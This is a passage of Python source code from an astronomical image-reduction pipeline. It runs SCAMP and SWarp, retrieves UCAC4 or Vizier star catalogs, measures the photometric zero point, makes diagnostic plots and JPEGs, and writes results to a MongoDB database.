-SAVE_TYPE REPLACE -WRITE_XML N {}'.format(\\\n self.working_file)\n self.logger.debug(' Running: {}'.format(missfits_cmd))\n output = subprocess.check_output(missfits_cmd, shell=True, timeout=timeout,\\\n stderr=subprocess.STDOUT, universal_newlines=True)\n output = str(output)\n for line in output.splitlines():\n self.logger.debug(line)\n except:\n self.logger.warning('Could not run MISSFITS to write SCAMP results to header')\n self.SCAMP_successful = True\n else:\n self.logger.critical('No .head file found from SCAMP. SCAMP failed.')\n self.SCAMP_successful = False\n\n os.chdir(origWD)\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done running SCAMP in {:.1f} s'.format(\n elapsed_time.total_seconds()))\n return self.SCAMP_successful\n\n\n ##-------------------------------------------------------------------------\n ## Run SWarp\n ##-------------------------------------------------------------------------\n '''\n Run SWarp on the image (after SCAMP distortion solution) to de-distort it.\n '''\n def run_SWarp(self, timeout=30):\n start_time = datetime.datetime.now()\n ## Parameters for SWarp\n swarp_file = os.path.join(self.tel.temp_file_path, 'swarpped.fits')\n if os.path.exists(swarp_file): os.remove(swarp_file)\n SWarp_params = {'IMAGEOUT_NAME': swarp_file,\n 'COPY_KEYWORDS': 'FILTER,OBJECT,AIRMASS,DATE-OBS,LAT-OBS,LONG-OBS,ALT-OBS,RA,DEC',\n 'WRITE_XML': 'N',\n 'XML_NAME': os.path.join(self.tel.temp_file_path, 'swarp.xml'),\n 'FSCALASTRO_TYPE': 'NONE',\n 'SUBTRACT_BACK': 'N',\n }\n SWarpCommand = [\"swarp\", self.working_file]\n for key in SWarp_params.keys():\n SWarpCommand.append('-{}'.format(key))\n SWarpCommand.append('{}'.format(SWarp_params[key]))\n self.logger.info(\"Running SWarp.\")\n self.logger.debug(\" SWarp command: {}\".format(' '.join(SWarpCommand)))\n try:\n SWarp_STDOUT = subprocess.check_output(SWarpCommand, timeout=timeout,\\\n stderr=subprocess.STDOUT,\\\n universal_newlines=True)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('SWARP timed out')\n except subprocess.CalledProcessError as e:\n self.logger.error(\"SWarp failed. Command: {}\".format(e.cmd))\n self.logger.error(\"SWarp failed. Returncode: {}\".format(e.returncode))\n self.logger.error(\"SWarp failed. Output: {}\".format(e.output))\n except:\n self.logger.error(\"SWarp process failed: {0}\".format(sys.exc_info()[0]))\n self.logger.error(\"SWarp process failed: {0}\".format(sys.exc_info()[1]))\n self.logger.error(\"SWarp process failed: {0}\".format(sys.exc_info()[2]))\n else:\n for line in SWarp_STDOUT.splitlines():\n MatchVersion = re.search('SWarp (\\d+\\.\\d+\\.\\d+) started on', line)\n if MatchVersion:\n self.logger.debug(' SWarp version = {}'.format(MatchVersion.group(1)))\n if not re.search('Resampling line', line) and\\\n not re.search('Setting up background map at', line):\n self.logger.debug(\" SWarp Output: \"+line)\n ## Replace working_file with SWarp output file\n if os.path.exists(swarp_file):\n self.logger.debug(' SWarp process succeeded.')\n self.logger.debug(' Moving SWarpped file to working file.')\n if os.path.exists(self.working_file): os.remove(self.working_file)\n os.rename(swarp_file, self.working_file)\n assert os.path.exists(self.working_file)\n self.read_header()\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done running SWarp in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Get Vizier Catalog\n ##-------------------------------------------------------------------------\n def get_catalog(self, max_stars=50000):\n '''\n Get a catalog using astroquery\n '''\n start_time = datetime.datetime.now()\n if self.image_WCS:\n import astroquery\n import astroquery.vizier\n catalog = self.tel.catalog_info['name']\n self.logger.info(\"Querying Vizier for {} catalog.\".format(catalog))\n\n if 'columns' in self.tel.catalog_info.keys():\n columns = self.tel.catalog_info['columns']\n else:\n if catalog == 'UCAC4': columns = ['_RAJ2000', '_DEJ2000',\\\n 'UCAC4', 'Bmag', 'Vmag',\\\n 'gmag', 'rmag', 'imag']\n else: columns = []\n self.logger.debug(' Getting columns: {}'.format(columns))\n\n if self.filter in self.tel.catalog_info.keys():\n catfilt = str(self.tel.catalog_info[self.filter])\n else:\n catfilt = 'R'\n if 'magmax' in self.tel.catalog_info:\n upperlimit = '<{:.1f}'.format(self.tel.catalog_info['magmax'])\n column_filters = {catfilt:upperlimit}\n self.logger.debug(' Using column_filters: {}'.format(column_filters))\n\n viz = astroquery.vizier.Vizier(catalog=catalog,\\\n columns=columns,\\\n column_filters=column_filters)\n viz.ROW_LIMIT = max_stars\n\n center_from_WCS = self.image_WCS.wcs_pix2world(\\\n [[self.nXPix/2, self.nYPix/2]], 1)\n self.coordinate_of_center_pixel = coords.SkyCoord(\\\n ra=center_from_WCS[0][0],\\\n dec=center_from_WCS[0][1],\\\n unit=(u.degree, u.degree),\\\n frame='icrs')\n footprint = self.image_WCS.calc_footprint()\n RAs = [val[0] for val in footprint]\n DECs = [val[1] for val in footprint]\n dRA = (max(RAs) - min(RAs))\n if dRA > 180:\n dRA = (min(RAs)+360. - max(RAs))\n dDEC = (max(DECs) - min(DECs))\n self.logger.debug(\" Center Coordinate: {}\".format(\\\n self.coordinate_of_center_pixel.to_string(\\\n style='hmsdms', precision=1)))\n\n vizier_data = viz.query_region(coordinates=self.coordinate_of_center_pixel,\\\n width=dRA*u.deg, height=dDEC*u.deg,\\\n catalog=catalog)\n n_stars = len(vizier_data[0])\n self.logger.info(\" Retrieved {} lines from {} catalog.\".format(n_stars, catalog))\n self.catalog_name = catalog\n self.catalog_data = vizier_data[0]\n\n ## Standardize Column Names\n if catalog == 'USNO-B1.0':\n self.catalog_data.rename_column('USNO-B1.0', 'ID')\n self.catalog_data.rename_column('_RAJ2000', 'RA')\n self.catalog_data.rename_column('_DEJ2000', 'Dec')\n if catalog == 'UCAC4':\n self.catalog_data.rename_column('UCAC4', 'ID')\n self.catalog_data.rename_column('_RAJ2000', 'RA')\n self.catalog_data.rename_column('_DEJ2000', 'Dec')\n else:\n self.logger.info(\"No image WCS, so catalog query skipped\")\n self.catalog_name = None\n self.catalog_data = None\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done retrieving Vizier catalog in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Get UCAC4 Catalog for Image from Local File\n ##-------------------------------------------------------------------------\n def get_local_UCAC4(self, timeout=30,\\\n local_UCAC_command=\"/Volumes/Data/UCAC4/access/u4test\",\\\n local_UCAC_data=\"/Volumes/Data/UCAC4/u4b\"):\n '''\n Get a list of stars which are in the image from a local UCAC catalog.\n '''\n start_time = datetime.datetime.now()\n assert type(self.coordinate_of_center_pixel) == coords.SkyCoord\n\n if not os.path.exists(local_UCAC_command):\n self.logger.warning('Cannot find local UCAC command: {}'.format(\\\n local_UCAC_command))\n elif not os.path.exists(local_UCAC_data):\n self.logger.warning('Cannot find local UCAC data: {}'.format(local_UCAC_data))\n else:\n center_from_WCS = self.image_WCS.wcs_pix2world([[self.nXPix/2, self.nYPix/2]], 1)\n footprint = self.image_WCS.calc_footprint()\n RAs = [val[0] for val in footprint]\n DECs = [val[1] for val in footprint]\n dRA = (max(RAs) - min(RAs))\n if dRA > 180:\n dRA = (min(RAs)+360. - max(RAs))\n dDEC = (max(DECs) - min(DECs))\n self.logger.info(\"Getting stars from local UCAC4 catalog.\")\n UCACcommand = [local_UCAC_command,\\\n \"{:.4f}\".format(self.coordinate_of_center_pixel.ra.degree),\\\n \"{:.4f}\".format(self.coordinate_of_center_pixel.dec.degree),\\\n \"{:.2f}\".format(dRA),\\\n \"{:.2f}\".format(dDEC),\\\n local_UCAC_data]\n self.logger.debug(\" Using command: {}\".format(' '.join(UCACcommand)))\n if os.path.exists(\"ucac4.txt\"): os.remove(\"ucac4.txt\")\n result = subprocess.call(UCACcommand, timeout=timeout)\n if os.path.exists('ucac4.txt'):\n catalog_file_path = os.path.join(self.tel.temp_file_path,\\\n 'ucac4.txt')\n shutil.move('ucac4.txt', catalog_file_path)\n self.temp_files.append(catalog_file_path)\n else:\n self.logger.warning(' No ucac4.txt output file found. Trying again.')\n result = subprocess.call(UCACcommand, timeout=timeout)\n if os.path.exists('ucac4.txt'):\n catalog_file_path = os.path.join(self.tel.temp_file_path,\\\n 'ucac4.txt')\n shutil.move('ucac4.txt', catalog_file_path)\n self.temp_files.append(catalog_file_path)\n else:\n self.logger.warning(' No ucac4.txt output file found. Trying again.')\n return False\n\n ## Read in UCAC catalog\n colnames = ('id', 'RA', 'Dec', 'mag1', 'mag2', 'smag', 'ot', 'dsf',\\\n 'RAepoch', 'Decepoch', 'dRA', 'dde', 'nt', 'nu', 'nc',\\\n 'pmRA', 'pmDec', 'sRA', 'sDec', '2mass', 'j', 'h', 'k',\\\n 'e2mphos', 'icq_flag', 'B', 'V', 'g', 'r', 'i')\n colstarts = (0, 10, 24, 36, 43, 50, 54, 57, 60, 68, 76, 80, 84, 87,\\\n 90, 93, 100, 107, 111, 115, 126, 133, 140, 147, 159,\\\n 168, 175, 182, 189, 196)\n colends = (9, 22, 35, 42, 49, 53, 56, 59, 67, 75, 79, 83, 86, 89,\\\n 92, 99, 106, 110, 114, 125, 132, 139, 146, 158, 167,\\\n 174, 181, 188, 195, 202)\n self.catalog_name = 'UCAC4'\n self.catalog_data = ascii.read(catalog_file_path,\\\n Reader=ascii.FixedWidthNoHeader,\\\n data_start=1, guess=False,\\\n names=colnames,\\\n col_starts=colstarts,\\\n col_ends=colends,\\\n )\n ## Standardize Column Names\n self.catalog_data.remove_columns(['smag', 'ot', 'dsf',\\\n 'mag1', 'mag2', 'dRA', 'dde',\\\n 'nt', 'nu', 'nc',\\\n 'pmRA', 'pmDec', 'sRA', 'sDec',\\\n '2mass', 'RAepoch', 'Decepoch',\\\n 'e2mphos', 'icq_flag'])\n self.catalog_data.rename_column('id', 'ID')\n self.catalog_data.rename_column('B', 'Bmag')\n self.catalog_data.rename_column('V', 'Vmag')\n self.catalog_data.rename_column('g', 'gmag')\n self.catalog_data.rename_column('r', 'rmag')\n self.catalog_data.rename_column('i', 'imag')\n\n ## Filter catalog for magnitude limits\n faint_stars_to_remove = []\n for i in range(0,len(self.catalog_data)):\n entry = self.catalog_data[i]\n if entry[self.tel.catalog_info[self.filter]] > self.tel.catalog_info['magmax']:\n faint_stars_to_remove.append(i)\n if len(faint_stars_to_remove) > 0:\n self.logger.info(' Removing {} faint stars ({} > {}) from catalog.'.format(\\\n len(faint_stars_to_remove),\\\n self.tel.catalog_info[self.filter],\\\n self.tel.catalog_info['magmax'],\\\n ))\n self.catalog_data.remove_rows(faint_stars_to_remove)\n\n nUCACStars = len(self.catalog_data)\n self.logger.info(\" Retrieved {} stars from UCAC catalog.\".format(nUCACStars))\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done retrieving local UCAC4 catalog in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Measure Zero Point\n ##-------------------------------------------------------------------------\n def measure_zero_point(self, plot=False):\n '''\n Estimate the zero point of the image by comparing the instrumental\n magnitudes as determined by SExtractor to the catalog magnitues.\n '''\n start_time = datetime.datetime.now()\n self.logger.info('Analyzing SExtractor results to determine photometric zero point')\n\n if self.SExtractor_results\\\n and ('assoc_catmag' in self.SExtractor_results.keys())\\\n and ('MAG_AUTO' in self.SExtractor_results.keys()):\n min_stars = 10\n\n zero_points = [entry['assoc_catmag'] - entry['MAG_AUTO']\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\\\n and not (float(entry['assoc_catmag']) == 0.0)]\n ## Weights assumes that uncertainty on a given measurement of the\n ## zero point is equal to 2.512/Ln(10)*1/SNR magnitudes\n ## m = 2.512 * log10(F)\n ## sig_m = dm/dF * sig_F = 2.512/ln(10) sig_F/F\n ## weight = 1/sig_m^2 = (ln(10)/2.512 * SNR)^2\n weights = [(np.log(10)/2.512*entry['FLUX_AUTO'] / entry['FLUXERR_AUTO'])**2\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\\\n and not (float(entry['assoc_catmag']) == 0.0)]\n\n self.logger.info(' Using {} stars with {} catalog magnitude'.format(\\\n len(zero_points), self.catalog_filter))\n\n if len(zero_points) < min_stars:\n self.logger.warning(' Zero point not calculated. Only {} catalog stars found.'.format(\\\n len(zero_points)))\n else:\n self.zero_point_mode = mode(zero_points, 0.1)\n self.zero_point_median = np.median(zero_points)\n self.zero_point_average = np.average(zero_points, weights=weights)\n self.zero_point_average_uncertainty = (np.sum(weights))**-0.5\n self.logger.debug(' Mode Zero Point = {:.2f}'.format(self.zero_point_mode))\n self.logger.debug(' Median Zero Point = {:.2f}'.format(self.zero_point_median))\n self.logger.info(' Weighted Average Zero Point = {:.2f}'.format(\\\n self.zero_point_average))\n# self.zero_point_average_uncertainty))\n# self.logger.info(' Weighted Average Zero Point = {:.2f} +/- {:.2f}'.format(\\\n# self.zero_point_average,\\\n# self.zero_point_average_uncertainty))\n self.zero_point = self.zero_point_average * u.mag\n\n ## Check zero point\n if self.tel.threshold_zeropoint and self.zero_point:\n if self.zero_point < self.tel.threshold_zeropoint:\n self.flags['zero point'] = True\n else:\n self.flags['zero point'] = False\n else:\n self.flags['zero point'] = False\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done measuring zero point in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n ## Make Plot if Requested\n if plot:\n self.make_zero_point_plot()\n\n\n ##-------------------------------------------------------------------------\n ## Make Zero Point Plot\n ##-------------------------------------------------------------------------\n def make_zero_point_plot(self):\n start_time = datetime.datetime.now()\n self.logger.info('Making ZeroPoint Plot')\n import matplotlib.pyplot as pyplot\n\n self.zero_point_plotfilename = self.raw_file_basename+'_ZeroPoint.png'\n self.zero_point_plotfile = os.path.join(self.tel.plot_file_path,\\\n self.zero_point_plotfilename)\n\n catalog_mags = [entry['assoc_catmag']\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n instrumental_mags = [entry['MAG_AUTO']\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n zero_points = [entry['assoc_catmag'] - entry['MAG_AUTO']\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n xpix = [entry['XWIN_IMAGE']\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n ypix = [entry['YWIN_IMAGE']\\\n for entry in self.SExtractor_results\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n residuals = [entry['assoc_catmag'] - entry['MAG_AUTO'] - self.zero_point.value\\\n for entry in self.SExtractor_results\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n\n zp_binsize = 0.1\n bmin = math.floor(min(zero_points)/zp_binsize)*zp_binsize - zp_binsize/2.\n bmax = math.ceil(max(zero_points)/zp_binsize)*zp_binsize + zp_binsize/2.\n zp_bins = np.arange(bmin,bmax,zp_binsize)\n zp_hist, zp_bins = np.histogram(zero_points, bins=zp_bins)\n zp_centers = (zp_bins[:-1] + zp_bins[1:]) / 2\n\n pyplot.ioff()\n fig = pyplot.figure(figsize=(10,11), dpi=100)\n\n reject_percent = 3.0\n padding = 0.5\n hist2d_binsize = 0.1\n\n ## Correlation of Instrumental Magnitude with Catalog Magnitude\n TopLeft = pyplot.axes([0.000, 0.650, 0.465, 0.335])\n TopLeft.set_aspect('equal')\n xmin = math.floor( ( (np.percentile(catalog_mags, reject_percent)-padding)*2))/2.\n xmax = math.ceil( ( (np.percentile(catalog_mags, 100.-reject_percent)+padding)*2))/2.\n ymin = math.floor( ( (np.percentile(instrumental_mags, reject_percent)-padding)*2))/2.\n ymax = math.ceil( ( (np.percentile(instrumental_mags, 100.-reject_percent)+padding)*2))/2.\n xbins = list(np.arange(xmin,xmax,hist2d_binsize))\n ybins = list(np.arange(ymin,ymax,hist2d_binsize))\n pyplot.title('Correlation of Instrumental and Calalog Magnitudes', size=10)\n pyplot.hist2d(catalog_mags, instrumental_mags, bins=[xbins, ybins], cmap='binary')\n pyplot.xlabel('{} {} Magnitude'.format(self.catalog_name, self.catalog_filter), size=10)\n pyplot.ylabel('Instrumental Magnitude', size=10)\n pyplot.xticks(np.arange(-5,25,1))\n pyplot.yticks(np.arange(-25,25,1))\n pyplot.grid()\n pyplot.ylim(ymin,ymax)\n pyplot.xlim(xmin,xmax)\n ## Overplot Line of Zero Point\n catmag = [-5,30]\n fitmag = [(val-self.zero_point.value) for val in catmag]\n pyplot.plot(catmag, fitmag, 'k-')\n\n\n ## Plot Histogram of Zero Point Values\n TopRight = pyplot.axes([0.535, 0.650, 0.465, 0.335])\n pyplot.title('Histogram of Zero Point Values for {}'.format(self.raw_file_name), size=10)\n pyplot.plot([self.zero_point_mode, self.zero_point_mode], [0, 1.1*max(zp_hist)],\\\n 'ro-', linewidth=2, label='Mode Zero Point', alpha=0.4)\n pyplot.plot([self.zero_point_median, self.zero_point_median], [0, 1.1*max(zp_hist)],\\\n 'go-', linewidth=2, label='Median Zero Point', alpha=0.4)\n pyplot.plot([self.zero_point_average, self.zero_point_average], [0, 1.1*max(zp_hist)],\\\n 'bo-', linewidth=2, label='Mode Zero Point', alpha=1.0)\n pyplot.bar(zp_centers, zp_hist, align='center', width=0.7*zp_binsize)\n pyplot.xlabel('Zero Point', size=10)\n pyplot.ylabel('N Stars', size=10)\n pyplot.xlim(np.percentile(zero_points, reject_percent)-padding,\\\n np.percentile(zero_points, 100.-reject_percent)+padding)\n pyplot.yticks(size=10)\n\n ## Plot Residuals\n MiddleLeft = pyplot.axes([0.000, 0.275, 0.465, 0.320])\n xmin = math.floor( ( (np.percentile(catalog_mags, reject_percent)-padding)*4))/4.\n xmax = math.ceil( ( (np.percentile(catalog_mags, 100.-reject_percent)+padding)*4))/4.\n ymin = math.floor( ( (np.percentile(residuals, reject_percent)-padding)*4))/4.\n ymax = math.ceil( ( (np.percentile(residuals, 100.-reject_percent)+padding)*4))/4.\n xbins = list(np.arange(xmin,xmax,hist2d_binsize))\n ybins = list(np.arange(ymin,ymax,hist2d_binsize))\n pyplot.hist2d(catalog_mags, residuals, bins=[xbins, ybins], cmap='binary')\n pyplot.xlabel('{} {} Magnitude'.format(self.catalog_name, self.catalog_filter), size=10)\n pyplot.ylabel('Magnitude Residuals', size=10)\n pyplot.grid()\n pyplot.ylim(ymin,ymax)\n pyplot.xlim(xmin,xmax)\n ## Overplot Line of Zero Point\n catmag = [-5,30]\n fitmag = [0, 0]\n pyplot.plot(catmag, fitmag, 'k-')\n\n ## Plot Spatial Distribution of Residuals\n range = [-0.5, 0.5]\n MiddleRight = pyplot.axes([0.535, 0.275, 0.465, 0.320])\n MiddleRight.set_aspect('equal')\n pyplot.title('Residuals scaled from {:+.1f} to {:+.1f}'.format(\\\n range[0], range[1]), size=10)\n if len(residuals) > 20000:\n gridsize = 20\n else:\n gridsize = 10\n pyplot.hexbin(xpix, ypix, residuals,\\\n gridsize=gridsize,\\\n mincnt=5,\\\n vmin=range[0], vmax=range[1],\\\n alpha=0.5,\\\n cmap='Reds')\n pyplot.xlabel('X Pixels', size=10)\n pyplot.ylabel('Y Pixels', size=10)\n pyplot.xlim(0,self.nXPix)\n pyplot.ylim(0,self.nYPix)\n pyplot.xticks(size=10)\n pyplot.yticks(size=10)\n\n pyplot.savefig(self.zero_point_plotfile, dpi=100,\\\n bbox_inches='tight', pad_inches=0.10)\n pyplot.close(fig)\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done making zero point plot in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n\n ##-------------------------------------------------------------------------\n ## Make JPEG of Image (using matplotlib)\n ##-------------------------------------------------------------------------\n def make_JPEG(self, jpeg_file_name, binning=1, p1=0.15, p2=0.5,\\\n mark_pointing=False,\\\n mark_detected_stars=False,\\\n mark_catalog_stars=False,\\\n mark_saturated=False,\\\n make_hist=False,\\\n transform=None,\n crop=None,\n quality=70,\n ):\n '''\n Make jpegs of image.\n '''\n start_time = datetime.datetime.now()\n self.logger.info('Making jpeg: {}'.format(jpeg_file_name))\n import matplotlib.pyplot as pyplot\n\n jpeg_file = os.path.join(self.tel.plot_file_path, jpeg_file_name)\n\n from PIL import Image, ImageDraw\n import skimage.exposure as skiex\n\n self.logger.debug(' Opening working file')\n with fits.open(self.working_file, ignore_missing_end=True) as hdulist:\n data = hdulist[0].data\n data_zero = np.ma.masked_equal(data, 0)\n data_nonzero = data_zero[~data_zero.mask]\n\n ## Make exposure histogram (of unscaled data)\n if make_hist:\n self.logger.info(' Make histogram of unscaled data.')\n histogram_plot_file = os.path.join(self.tel.plot_file_path,\\\n '{}_hist.png'.format(self.raw_file_basename))\n hist_low = np.percentile(data_nonzero.ravel(), p1)\n hist_high = np.percentile(data_nonzero.ravel(), 100.-p2)\n hist_nbins = 128\n hist_binsize = (hist_high-hist_low)/128\n hist_bins = np.arange(hist_low,hist_high,hist_binsize)\n self.logger.debug(' Histogram range: {} {}.'.format(hist_low, hist_high))\n pyplot.ioff()\n fig = pyplot.figure()\n pyplot.hist(data.ravel(), bins=hist_bins,\\\n label='binsize = {:4f}'.format(hist_binsize))\n pyplot.xlim(hist_low,hist_high)\n pyplot.legend(loc='best')\n pyplot.xlabel('Pixel value')\n pyplot.ylabel('Number of Pixels')\n self.logger.info(' Saving histogram to {}.'.format(histogram_plot_file))\n pyplot.savefig(histogram_plot_file)\n pyplot.close(fig)\n\n ## Rescale data using arcsinh transform for jpeg\n self.logger.debug(' Rescaling image data using arcsinh')\n rescaled_data = np.arcsinh(data_zero)\n rescaled_data = rescaled_data / rescaled_data.max()\n rescaled_data_nonzero = rescaled_data[~rescaled_data.mask]\n low = np.percentile(rescaled_data_nonzero, p1)\n high = np.percentile(rescaled_data_nonzero, 100.-p2)\n self.logger.debug(' Clipping data using {} and {} percentiles.'.format(p1, 100.-p2))\n self.logger.debug(' Clipping data using {} and {} rescaled values.'.format(low, high))\n opt_img = skiex.exposure.rescale_intensity(rescaled_data, in_range=(low,high))\n jpegdata = (opt_img * 255.).astype('uint8')\n\n ## Create PIL Image object\n im = Image.fromarray(jpegdata).convert('RGB')\n draw = ImageDraw.Draw(im)\n\n ## If mark_pointing is set\n if mark_pointing and self.coordinate_from_header and self.image_WCS:\n xy = self.image_WCS.wcs_world2pix([[self.coordinate_from_header.ra.degree,\\\n self.coordinate_from_header.dec.degree]], 1)[0]\n x = int(xy[0])\n y = int(xy[1])\n self.logger.debug(' Marking crosshairs at (x, y) = ({}, {})'.format(\\\n im.size[0]/2, im.size[1]/2))\n line_color = 'yellow'\n draw.line((im.size[0]/2+0, 0, im.size[0]/2+0, im.size[1]), fill=line_color)\n draw.line((0, im.size[1]/2+0, im.size[0], im.size[1]/2+0), fill=line_color)\n\n ## Draw Crosshair Over Pointing Location from Header\n self.logger.debug(' Marking pointing at (x, y) = ({}, {})'.format(x, y))\n crosshair_color = 'cyan'\n ms = int((self.tel.pointing_marker_size.to(u.arcsec) / self.tel.pixel_scale).to(u.pix).value)/2\n self.logger.debug(' Pointing marker diameter is {} = {} pix'.format(\\\n self.tel.pointing_marker_size.to(u.arcmin), ms*2))\n thickness = 5\n for i in range(-1*int((thickness-1)/2),int((thickness+1)/2),1):\n draw.line((x-1.5*ms, y+i, x-0.5*ms, y+i), fill=crosshair_color)\n draw.line((x+1.5*ms, y+i, x+0.5*ms, y+i), fill=crosshair_color)\n draw.line((x+i, y-1.5*ms, x+i, y-0.5*ms), fill=crosshair_color)\n draw.line((x+i, y+1.5*ms, x+i, y+0.5*ms), fill=crosshair_color)\n radii = np.linspace(ms, ms+thickness, thickness)\n for r in radii:\n draw.ellipse((x-r, y-r, x+r, y+r), outline=crosshair_color)\n\n ## Mark Catalog Stars\n if mark_catalog_stars and self.catalog_data:\n if self.FWHM:\n ms = max([7, 2.1*math.ceil(self.FWHM.to(u.pix).value)])\n else:\n ms = 7\n circle_color = 'red'\n self.logger.debug(' Marking catalog stars with {} radius {} circles'.format(ms, circle_color))\n\n for star in self.catalog_data:\n xy = self.image_WCS.wcs_world2pix([[float(star['RA']), float(star['Dec'])]], 1)[0]\n x = int(xy[0])\n y = int(xy[1])\n thickness = 2\n radii = np.linspace(ms, ms+thickness, 1)\n for r in radii:\n draw.ellipse((x-r, y-r, x+r, y+r), outline=circle_color)\n\n ## Mark Detected Stars\n if mark_detected_stars and self.SExtractor_results:\n if self.FWHM:\n ms = max([6, 2*math.ceil(self.FWHM.to(u.pix).value)])\n else:\n ms = 6\n circle_color = 'green'\n self.logger.debug(' Marking detected stars with {} radius {} circles'.format(ms, circle_color))\n for star in self.SExtractor_results:\n x = star['XWIN_IMAGE']\n y = star['YWIN_IMAGE']\n thickness = 2\n radii = np.linspace(ms, ms+thickness, 1)\n for r in radii:\n draw.ellipse((x-r, y-r, x+r, y+r), outline=circle_color)\n\n ## Flag Saturated Pixels\n if mark_saturated and self.tel.saturation:\n saturated_color = 'red'\n with fits.open(self.working_file, ignore_missing_end=True) as hdulist:\n data_raw = hdulist[0].data\n data_saturated = np.ma.masked_greater(data_raw, self.tel.saturation)\n indices = np.where(data_saturated.mask == 1)\n if len(indices) > 4:\n xy = zip(indices[1], indices[0])\n draw.point(xy, fill=saturated_color)\n\n ## Flip JPEG to account for difference in origins of FITS and jpg images\n im = im.transpose(Image.FLIP_TOP_BOTTOM)\n \n ## Flip JPG if requested\n if transform:\n self.logger.debug(' Transforming (flipping/rotating) jpeg: {}'.format(transform))\n if transform == 'flip_vertical':\n im = im.transpose(Image.FLIP_TOP_BOTTOM)\n elif transform == 'flip_horizontal':\n im = im.transpose(Image.FLIP_LEFT_RIGHT)\n elif transform == 'rotate90':\n im = im.transpose(Image.ROTATE_90)\n elif transform == 'rotate180':\n im = im.transpose(Image.ROTATE_180)\n elif transform == 'rotate270':\n im = im.transpose(Image.ROTATE_270)\n else:\n self.logger.warning(' Transform \"{}\" not understood.'.format(transform))\n self.logger.warning(' No transform performed.'.format(transform))\n\n ## If crop is set\n if crop:\n if len(crop) == 4:\n self.logger.debug(' Cropping image to {}'.format(crop))\n im = im.crop(crop)\n\n ## If binning is set create thumbnail\n if binning > 1:\n size = (int(data.shape[0]/binning), int(data.shape[1]/binning))\n self.logger.debug(' Resizing image by binning factor of {}'.format(binning))\n im.thumbnail(size, Image.ANTIALIAS)\n\n ## Save to JPEG\n self.logger.debug(' Saving jpeg (p1={:.1f}, p2={:.1f}), bin={}, q={:.0f}) to: {}'.format(\\\n p1, p2, binning, quality, jpeg_file_name))\n im.save(jpeg_file, 'JPEG', quality=quality)\n self.jpeg_file_names.append(jpeg_file_name)\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done making JPEG in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Clean Up by Deleting Temporary Files\n ##-------------------------------------------------------------------------\n def clean_up(self):\n '''\n Clean up by deleting temporary files.\n '''\n self.logger.info(\"Cleaning Up Temporary Files.\")\n for item in self.temp_files:\n if os.path.exists(item):\n self.logger.debug(\" Deleting {0}\".format(item))\n os.remove(item)\n\n\n ##-------------------------------------------------------------------------\n ## Append Line With Image Info to YAML Text File\n ##-------------------------------------------------------------------------\n def add_mongo_entry(self):\n assert self.tel.mongo_address\n assert self.tel.mongo_port\n assert self.tel.mongo_db\n assert self.tel.mongo_collection\n address = self.tel.mongo_address\n port = self.tel.mongo_port\n db_name = self.tel.mongo_db\n collection_name = self.tel.mongo_collection\n ## Connect to mongo database\n self.logger.info('Writing results to mongo db at {}:{}'.format(address, port))\n try:\n client = MongoClient(address, port)\n self.logger.debug(' Connected to client')\n except:\n self.logger.warning(' Failed to connect to client')\n return False\n\n try:\n db = client[db_name]\n self.logger.debug(' Connected to database: {}'.format(db_name))\n except:\n self.logger.warning(' Failed to connect to database')\n return False\n\n try:\n data = db[collection_name]\n self.logger.debug(' Found collection: {}'.format(collection_name))\n except:\n self.logger.warning(' Failed to find collection')\n return False\n\n\n ## Form datum to add\n ## Form dictionary with new result info\n new_result = {}\n try:\n new_result['filename'] = str(self.raw_file_name)\n self.logger.debug(' Result: filename = {}'.format(new_result['filename']))\n except: self.logger.warning(' Could not write filename to result')\n\n try:\n new_result['target name'] = str(self.object_name)\n self.logger.debug(' Result: target name = {}'.format(new_result['target name']))\n except: self.logger.warning(' Could not write target name to result')\n\n try:\n new_result['target RA'] = self.coordinate_from_header.to_string('hmsdms', sep=':').split()[0]\n new_result['target Dec'] = self.coordinate_from_header.to_string('hmsdms', sep=':').split()[1]\n self.logger.debug(' Result: target RA = {}'.format(new_result['target RA']))\n self.logger.debug(' Result: target Dec = {}'.format(new_result['target Dec']))\n except: self.logger.warning(' Could not write target RA and Dec to result')\n\n try:\n new_result['exposure time'] = self.exptime.value\n self.logger.debug(' Result: exposure time = {}'.format(new_result['exposure time']))\n except: self.logger.warning(' Could not write exposure time to result')\n\n try:\n new_result['filter'] = str(self.filter)\n self.logger.debug(' Result: filter = 